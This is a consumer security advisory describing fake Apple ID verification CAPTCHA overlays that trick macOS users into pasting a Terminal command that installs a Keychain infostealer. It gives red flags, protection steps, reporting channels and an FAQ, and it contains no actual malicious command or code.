Fake Apple ID Verification CAPTCHA Malware Scam on macOS
Scam websites display fake Apple ID verification CAPTCHA prompts that instruct macOS users to open Terminal and paste a command to 'prove they are human', silently installing malware under the guise of Apple account verification.
Part of: Fake CAPTCHA Malware Scams
Last reviewed: 8 June 2026
Apple's ecosystem has a strong reputation for security, which makes macOS users somewhat less vigilant about security prompts they encounter on the web. Criminals have engineered a specific attack that combines the Apple brand's authority with the now-widespread fake-CAPTCHA social engineering technique.
A malicious or compromised website presents a full-screen overlay branded with the Apple logo and styling from appleid.apple.com. It declares that the visitor's Apple ID needs to be verified to continue and presents step-by-step instructions that direct the user to open macOS Terminal, paste a command, and press Enter.
The command downloads and silently installs an infostealer targeting the macOS Keychain, which stores Apple ID credentials, Safari saved passwords, and other sensitive data, sending them to the attacker before the victim realises anything unusual has occurred.
How this scam works on the Apple brand
Apple's genuine Apple ID verification is handled entirely within the browser at appleid.apple.com or through device-native prompts such as Face ID, Touch ID, or a system dialog. Apple never directs users to open Terminal or execute command-line code as part of any authentication or verification process.
The fake overlay appears when a victim visits a compromised website or follows a redirect chain from a malicious ad. It closely mimics Apple's clean white interface and the familiar Apple ID padlock icon. The verification steps are presented in numbered format with official-looking instructional language, which reduces the appearance of risk.
Because macOS users have been conditioned to trust Apple's design language and consider their platform more secure, they may comply with the terminal instruction before questioning it. The malware targets Keychain data specifically because it contains credentials for every service the victim uses.
Common red flags
- A browser page claiming to be Apple ID verification asks you to open Terminal or run a command.
- Apple never asks users to open Terminal, paste commands, or execute scripts to verify their Apple ID.
- The page appears on a site that is not appleid.apple.com — check the address bar carefully.
- The overlay cannot be closed and fills the entire browser window.
- The verification steps reference copying something from your clipboard.
- The page appeared after clicking an ad or being redirected from an unrelated site.
How to protect yourself
- Never open Terminal or execute any command at the instruction of a website, regardless of the branding shown.
- Verify your Apple ID status directly at appleid.apple.com — never via a web overlay prompt.
- Enable Mac's built-in Gatekeeper at System Settings > Privacy and Security to block unverified software.
- If you ran the command, disconnect from the internet immediately, run Malwarebytes for Mac or a reputable security tool, and change your Apple ID password at appleid.apple.com.
- Review saved passwords and credentials in your macOS Keychain via the Keychain Access app and change any that may have been exposed.
- Enable two-factor authentication on your Apple ID at appleid.apple.com > Security if not already active.
How to report it
- Report the malicious website to Apple at [email protected].
- Report the URL to Google Safe Browsing at safebrowsing.google.com/safebrowsing/report_phish/.
- Report to the FTC at ReportFraud.ftc.gov (US) or Action Fraud at actionfraud.police.uk (UK).
- Submit the malicious command or file to VirusTotal at virustotal.com.
Frequently asked questions
Does Apple ever ask users to run Terminal commands to verify their Apple ID?
Never. Apple ID verification is handled entirely through the browser at appleid.apple.com, device-native Face ID or Touch ID prompts, or in-app authentication flows. A prompt instructing you to open Terminal is always malicious.
What is the macOS Keychain and why do attackers want it?
The macOS Keychain is a secure storage system built into macOS that holds passwords, encryption keys, and certificates for websites, apps, and system services. If compromised, it gives an attacker access to credentials for every account the victim uses on that Mac.
I ran the command on my Mac. What should I do immediately?
Disconnect from the internet, then run a reputable macOS security scanner such as Malwarebytes for Mac. Change your Apple ID password at appleid.apple.com and review your Keychain for exposed credentials. Consider resetting the Mac to a known good state.